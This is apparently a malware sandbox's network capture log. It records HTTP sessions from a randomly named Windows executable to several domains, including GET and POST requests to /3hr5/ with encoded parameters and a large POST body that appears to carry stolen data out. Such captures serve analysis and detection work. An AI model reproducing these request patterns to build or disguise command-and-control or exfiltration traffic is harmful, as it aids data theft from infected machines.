d2 07 df 75 b5 7b 06 63 83 f6 df 4d ad 5b bf 5b 11 78 f8 d9 ab 2e af dc aa 5a ff c6 69 30 08 d4 55 79 e2 43 7f 16 45 f1 99 d2 da f5 fd a4 8c c0 eb 17 ce 40 d0 57 cc 82 a0 29 f1 fb f8 7b 88 25 bf a4 f9 b6 fb 41 fb 32 db cb 86 20 12 f8 79 9e e5 75 c7 c0 5e f1 24 26 61 c4 57 04 20 9f c9 a0 80 d0 db 9f ef d6 13 a3 2f 83 bf d0 f5 19 03 4d 5f 46 7f cf d4 cf e8 f3 00 10 f4 66 1f 40 8f f7 c3 62 5f d1 fc 9e b0 77 a3 62 e4 17 5b f5 d9 07 c2 9e e4 dd 3f 62 b3 80 dc 7e 5e 78 70 df 87 ef 5a d7 4f 86 ee 7b 88 78 dd d3 e7 65 01 c2 5f e5 13 82 fc a4 ab 73 17 88 9e 97 57 e7 ec 79 98 e7 8d a0 bf dc 88 cf dd 50 80 91 5e d5 e4 65 6b 41 4b 08 7d 59 c0 4d 99 ee 94 78 55 df 57 c5 3b c1 78 4f f1 2f 11 f0 a4 36 2f cb 7f 2b b2 cf eb f8 6a aa ef a1 b2 2a 83 77 ec ff f3 19 a8 88 0b b4 e1 55 74 80 d0 de 74 e6 2e 8d 2f 24 3e 69 eb 8b 00 a2 08 f2 ff 7c 2d 3a bf 20 36 9f bb 6a 68 cf 01 f4 1f 5f 4b cf 2b e7 5f 58 f4 a5 59 78 ee fd f7 67 93 f3 b5 12 09 ec ed e7 65 77 5f 6c 12 90 70 91 bf fd fc 86 1d 7b 90 f8 96 87 ef f4 f1 ad 34 3c 38 f2 0b 9c 7c 26 f5 b3 ef 02 f3 fb 4c f0 1b c9 67 5e 39 56 01 d3 15 e6 d5 f4 3d e4 0e 7d f5 35 ed af f6 54 92 de 6d d7 e7 a4 0c ab 97 c1 5f d9 f6 95 b6 be a7 e6 f3 4d 89 7e 2e 87 c2 0b da 37 aa f2 b5 fd 7e cf b1 67 23 c2 71 2f 26 fd 95 2f 40 49 5e 67 7d 11 e6 f6 c9 a4 be 1a 39 41 10 9e 17 d8 07 97 fe 3b 37 4f 22 e0 00 ee 0d df af ed 46 e4 97 6b fb 2e 0f c2 9b 89 7e 63 15 bf 34 bd 5f 0f f2 7d 7c 63 f0 ab 49 f8 7a 9d 12 75 fb f9 ba e7 67 17 b8 c6 f1 95 8a 5f 72 71 12 0f fe 7b df 35 4e 7c 3f 28 5f 26 7c 51 d8 af d4 0d 08 06 f4 cc 55 96 41 58 84 fc 0b f4 3f 77 d9 76 bf 1f 93 0e f8 14 e0 f6 5e 5a 50 14 f5 f2 fa 73 df 02 5f f3 5d d8 ba 45 00 b6 f0 17 db 3c af fb e5 e5 93 25 7d 9e e2 dd 18 9f bb 20 0f ce ef 27 7c b4 07 cd 9f d4 ed cf c0 bb f7 c1 cf bd eb e5 cf 3c 79 b1 fd 0f 0e 3c 19 08 b0 a6 dc ad 3b e0 0b 9f 3f dd 5e df c7 79 37 46 7f 73 53 50 ff bc 37 5f 58 40 ec 55 6a 7c df ff c7 23 00 df 7a 33 9b 4f 3c ff 62 a0 67 be ff 3a 01 cf dd fb f8 69 84 2f 14 fe b1 ba f7 1e ed c9 9e fe a6 41 93 b2 1e
                                                                                                                              Data Ascii: 200AgF6}~'vkWjx$Zo<[Jp#F'dex~7a'U-?PcC~|>''UUUx9~4ut #{JsW`?K/O8p()x?z[o/BH{(1-4&.e]I<g\(<'I|X|AL'Lqu{cM[[x.Zi0UyCE@W){%A2 yu^$&aW /M_Ff@b_wb[?b~^xpZO{xe_sWyP^ekAK}YMxUW;xO/6/+j*wUtt./$>i|-: 6jh_K+_XYxgew_lp{4<8|&Lg^9V=}5Tm_M~.7~g#q/&/@I^g}9A;7O"Fk.~c4_}|cIzug_rq{5N|?(_&|QUAX?wv^ZPs_]E<%} '|<y<;?^y7FsSP7_X@Uj|#z3O<bg:i/A


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              61192.168.11.2050192216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:44.852792978 CET532OUTGET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:44.981888056 CET1328INHTTP/1.1 200 OK
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:26:44 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              x-download-options: noopen
                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                              etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                              x-request-id: c44a6bb0-7201-47ec-90a9-9a55aa895399
                                                                                                                              x-runtime: 0.012841
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 37 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 72 69 74 75 61 6c 79 6f 67 61 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                                                              Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.
                                                                                                                              Dec 4, 2023 15:26:44.981949091 CET1328INData Raw: 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61
                                                                                                                              Data Ascii: hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>ritualyoga.org</h1><h2>is a totally awesome idea still being
                                                                                                                              Dec 4, 2023 15:26:44.981993914 CET1328INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77
                                                                                                                              Data Ascii: "https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></u
                                                                                                                              Dec 4, 2023 15:26:44.982036114 CET1328INData Raw: 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e
                                                                                                                              Data Ascii: 359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1
                                                                                                                              Dec 4, 2023 15:26:44.982072115 CET1328INData Raw: 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d
                                                                                                                              Data Ascii: M768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.
                                                                                                                              Dec 4, 2023 15:26:44.982100010 CET218INData Raw: 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 20 20 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41
                                                                                                                              Data Ascii: nt,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              62192.168.11.205019337.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:50.161400080 CET795OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 62 74 69 33 50 65 74 42 4b 64 78 6d 2b 64 6c 63 45 36 4d 4b 42 61 72 76 76 36 79 46 39 51 61 47 41 31 65 4d 64 6f 79 6d 68 78 51 6c 74 48 38 6f 41 69 62 59 62 33 66 72 53 76 7a 34 39 50 68 51 66 6a 61 70 79 2b 2b 52 69 77 6b 6b 77 68 68 39 67 67 56 52 36 31 2b 68 4a 72 38 31 70 30 34 6e 49 35 30 4c 4a 58 76 48 36 76 53 57 70 42 67 35 6a 53 4f 38 42 70 39 58 31 4b 6f 6b 31 6b 49 41 46 77 76 61 33 51 57 72 76 68 39 50 6e 42 35 58 35 32 54 49 67 52 66 49 74 6b 4b 69 43 61 77 33 30 59 58 35 70 6e 46 41 6d 48 6d 68 43 63 75 72 41 67 3d 3d
                                                                                                                              Data Ascii: TZd=bti3PetBKdxm+dlcE6MKBarvv6yF9QaGA1eMdoymhxQltH8oAibYb3frSvz49PhQfjapy++Riwkkwhh9ggVR61+hJr81p04nI50LJXvH6vSWpBg5jSO8Bp9X1Kok1kIAFwva3QWrvh9PnB5X52TIgRfItkKiCaw30YX5pnFAmHmhCcurAg==
                                                                                                                              Dec 4, 2023 15:26:50.330929041 CET242INHTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              63192.168.11.205019437.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:52.856779099 CET1135OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 62 74 69 33 50 65 74 42 4b 64 78 6d 2f 38 56 63 48 64 77 4b 41 36 72 6f 6b 61 79 46 7a 77 61 4b 41 31 61 4d 64 70 32 4d 68 44 45 6c 74 6a 77 6f 42 6e 6e 59 57 58 66 72 61 50 7a 78 6a 2f 68 58 66 6a 48 57 79 2f 43 52 69 77 77 6b 78 53 70 39 6d 51 56 4f 76 46 2b 67 65 62 38 77 2b 45 34 68 49 35 35 6b 4a 54 6e 48 39 66 2b 57 6f 44 34 35 31 54 4f 39 57 4a 39 64 7a 4b 6f 6e 37 45 49 30 46 77 53 6c 33 52 76 63 76 58 64 50 6b 6c 4a 58 2b 47 54 4a 75 68 66 50 6c 45 4c 73 54 35 6f 79 79 2b 6e 36 38 47 4e 75 6a 45 2f 71 50 34 7a 37 62 49 49 59 34 77 34 72 70 48 67 75 2f 43 70 54 6b 2f 38 55 69 62 45 7a 68 50 47 41 71 41 54 38 52 7a 2b 6a 52 43 4f 5a 47 51 4a 54 30 64 7a 56 47 70 6c 58 62 57 4b 47 39 59 69 52 77 49 57 38 72 59 36 78 4a 41 48 69 53 74 7a 59 42 50 58 4a 37 54 50 39 78 42 4a 6e 39 4f 49 2b 37 32 51 59 42 76 4c 47 36 36 35 34 53 44 6f 43 59 30 36 71 71 66 6e 38 4e 32 48 36 5a 36 39 45 59 57 59 6d 38 79 72 76 56 54 61 2b 61 43 72 31 36 30 79 52 4d 6c 6d 49 53 31 41 56 74 46 6d 4c 42 50 76 6b 32 65 59 4f 33 5a 64 71 77 74 76 38 58 33 47 6a 4d 4f 34 58 70 73 67 35 70 53 2b 2f 37 56 33 43 63 47 52 74 7a 59 31 53 36 67 58 4b 42 62 44 61 51 67 31 46 65 37 43 46 69 57 66 5a 74 6d 61 50 73 34 4d 50 6e 4c 75 4e 72 38 33 70 4f 57 2f 4a 44 59 43 43 63 31 37 48 43 36 6c 2b 34 58 6b 38 49 4c 67 6e 74 47 34 70 42 49 6e 2b 55 30 45 75 31 58 74 77 6c 7a 57 38 75 61 76 6a 6d 6a 37 52 75 69 45 75 34 77 67 45 32 36 6e 37 36 59 4d 31 4a 34 51 52 44 5a 53 73 6b 35 31 67 52 31 47 53 4a 75 77 69 54 53 4a 46 4d 34 74 64 5a 6a 46 67 76 6c 6a 79 72 6c 67 3d
                                                                                                                              Data Ascii: TZd=bti3PetBKdxm/8VcHdwKA6rokayFzwaKA1aMdp2MhDEltjwoBnnYWXfraPzxj/hXfjHWy/CRiwwkxSp9mQVOvF+geb8w+E4hI55kJTnH9f+WoD451TO9WJ9dzKon7EI0FwSl3RvcvXdPklJX+GTJuhfPlELsT5oyy+n68GNujE/qP4z7bIIY4w4rpHgu/CpTk/8UibEzhPGAqAT8Rz+jRCOZGQJT0dzVGplXbWKG9YiRwIW8rY6xJAHiStzYBPXJ7TP9xBJn9OI+72QYBvLG6654SDoCY06qqfn8N2H6Z69EYWYm8yrvVTa+aCr160yRMlmIS1AVtFmLBPvk2eYO3Zdqwtv8X3GjMO4Xpsg5pS+/7V3CcGRtzY1S6gXKBbDaQg1Fe7CFiWfZtmaPs4MPnLuNr83pOW/JDYCCc17HC6l+4Xk8ILgntG4pBIn+U0Eu1XtwlzW8uavjmj7RuiEu4wgE26n76YM1J4QRDZSsk51gR1GSJuwiTSJFM4tdZjFgvljyrlg=
                                                                                                                              Dec 4, 2023 15:26:53.034671068 CET242INHTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              64192.168.11.205019537.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:55.551474094 CET1340OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 62 74 69 33 50 65 74 42 4b 64 78 6d 2f 38 56 63 48 64 77 4b 41 36 72 6f 6b 61 79 46 7a 77 61 4b 41 31 61 4d 64 70 32 4d 68 44 63 6c 73 51 34 6f 41 45 50 59 58 58 66 72 51 76 7a 38 6a 2f 67 53 66 6a 66 53 79 2f 4f 72 69 79 49 6b 78 42 52 39 6d 6d 70 4f 2b 31 2b 30 43 4c 38 32 70 30 35 32 49 35 31 34 4a 54 62 39 36 75 36 57 70 45 63 35 6b 30 53 38 63 35 39 58 7a 4b 6f 72 74 45 49 57 46 77 6d 50 33 52 6a 63 76 52 46 50 6c 55 31 58 75 42 2f 4a 6e 52 66 4d 72 6b 4c 33 4a 4a 70 49 79 34 4b 4c 38 47 4e 2b 6a 47 54 71 50 2f 76 37 61 50 55 62 34 51 34 72 32 33 67 74 70 79 6c 49 6b 2f 68 48 69 65 34 7a 68 4a 43 41 6f 67 54 38 48 69 2b 67 42 53 4f 44 43 51 49 56 2b 39 33 64 47 70 78 74 62 53 47 47 38 6f 47 52 7a 62 2b 38 70 38 75 78 45 41 48 67 63 4e 79 63 4c 76 57 51 37 58 53 65 78 41 6f 63 39 4f 73 2b 68 58 77 59 58 62 6e 42 39 61 35 79 58 44 6f 58 50 45 32 32 71 66 58 57 4e 32 48 71 5a 37 35 45 5a 6d 6f 6d 39 77 50 73 66 54 61 31 54 69 71 76 6f 30 2b 62 4d 6c 72 46 53 31 5a 51 74 43 32 4c 42 76 76 6b 7a 35 6b 4e 39 70 64 74 76 39 75 37 4b 6e 47 77 4d 4f 31 38 70 6f 34 50 70 44 43 2f 35 6c 6e 43 5a 57 52 75 6c 6f 31 4f 7a 41 58 4d 57 72 44 61 51 67 35 33 65 37 47 46 69 43 33 5a 38 47 71 50 71 70 4d 50 6c 4c 75 4c 72 38 33 34 4f 57 79 70 44 59 4b 67 63 31 4b 73 43 35 4a 2b 35 44 67 38 45 71 67 6f 39 6d 34 73 46 49 6d 2b 61 55 49 44 31 57 42 34 6c 7a 47 73 75 73 37 6a 6e 6a 72 52 73 53 45 74 2b 51 67 48 33 36 6e 58 72 49 78 30 4a 34 6b 37 44 59 32 38 6b 2b 78 67 53 53 69 50 52 74 73 76 4a 6c 74 57 4b 50 68 43 52 44 64 75 31 67 33 50 35 43 6c 4c 51 72 4d 57 50 7a 43 2f 42 68 36 2f 37 31 32 79 37 45 46 6e 4d 62 6c 56 79 4f 59 4c 32 71 69 61 4b 75 44 74 32 44 79 35 6e 4f 30 63 41 73 43 7a 66 77 47 4f 6e 39 7a 6b 56 59 4e 35 59 66 71 71 59 63 53 4d 50 41 54 55 61 70 57 32 62 4f 50 34 5a 43 54 51 47 7a 31 68 63 61 31 34 67 69 46 64 67 62 4a 61 68 6e 49 70 65 66 66 33 33 38 30 54 6d 63 4e 59 55 42 53 69 2f 52 43 34 46 6f 76 78 47 4f 50 57 5a 32 5a 76 6a 71 61 74 6b 4a 53 49 34 68 73 39 6d 6b 49 38 32 34 54 4d 73 42 38 52 58 70 78 66 6f 64 4b 2b 50 62 6d 79 52 54 72 4f 32 53 42 53 66 6e 42 77 55 5a 34 74 43 68 76 4a 41 71 77 6a 6a 6c 36 56 6f 34 33
                                                                                                                              Data Ascii: TZd=bti3PetBKdxm/8VcHdwKA6rokayFzwaKA1aMdp2MhDclsQ4oAEPYXXfrQvz8j/gSfjfSy/OriyIkxBR9mmpO+1+0CL82p052I514JTb96u6WpEc5k0S8c59XzKortEIWFwmP3RjcvRFPlU1XuB/JnRfMrkL3JJpIy4KL8GN+jGTqP/v7aPUb4Q4r23gtpylIk/hHie4zhJCAogT8Hi+gBSODCQIV+93dGpxtbSGG8oGRzb+8p8uxEAHgcNycLvWQ7XSexAoc9Os+hXwYXbnB9a5yXDoXPE22qfXWN2HqZ75EZmom9wPsfTa1Tiqvo0+bMlrFS1ZQtC2LBvvkz5kN9pdtv9u7KnGwMO18po4PpDC/5lnCZWRulo1OzAXMWrDaQg53e7GFiC3Z8GqPqpMPlLuLr834OWypDYKgc1KsC5J+5Dg8Eqgo9m4sFIm+aUID1WB4lzGsus7jnjrRsSEt+QgH36nXrIx0J4k7DY28k+xgSSiPRtsvJltWKPhCRDdu1g3P5ClLQrMWPzC/Bh6/712y7EFnMblVyOYL2qiaKuDt2Dy5nO0cAsCzfwGOn9zkVYN5YfqqYcSMPATUapW2bOP4ZCTQGz1hca14giFdgbJahnIpeff3380TmcNYUBSi/RC4FovxGOPWZ2ZvjqatkJSI4hs9mkI824TMsB8RXpxfodK+PbmyRTrO2SBSfnBwUZ4tChvJAqwjjl6Vo43
                                                                                                                              Dec 4, 2023 15:26:55.551522970 CET1340OUTData Raw: 6b 48 79 44 57 6d 48 37 7a 78 66 77 41 68 53 79 4e 38 47 53 4e 31 4b 38 2b 43 67 59 6e 6a 49 6e 4b 39 4e 4d 32 50 50 4c 68 4f 39 4e 4a 48 58 58 4d 33 74 4b 46 58 59 71 57 49 4e 50 53 63 76 61 72 42 4c 73 6d 72 55 63 53 2b 41 47 59 50 32 75 67 7a
                                                                                                                              Data Ascii: kHyDWmH7zxfwAhSyN8GSN1K8+CgYnjInK9NM2PPLhO9NJHXXM3tKFXYqWINPScvarBLsmrUcS+AGYP2ugzETMVCpHIGZJMgrf21xQIUJkF9yZFVuwLucIz+HKBV9254NeYrpFMIbdisEUmvaJHuZo96p9GP02MYY6BT2GoOzdtQhOE+MmTKJqrYCIwuiW4kcu/Km/qg8rUDt12/EoLA7+mjjyNv4s10XW9fA+vYGqkk3KfvdlZm
                                                                                                                              Dec 4, 2023 15:26:55.551574945 CET10342OUTData Raw: 4a 4b 2f 71 48 76 35 6b 75 58 71 6f 7a 45 2b 72 64 2f 6a 34 66 57 56 67 77 6d 4f 65 79 57 50 69 31 4e 6a 74 38 62 41 7a 43 66 78 59 62 53 73 76 78 4c 66 48 70 4f 7a 31 57 70 56 43 68 38 67 77 66 46 50 6a 67 4d 4a 32 6c 4b 62 61 34 77 73 61 49 52
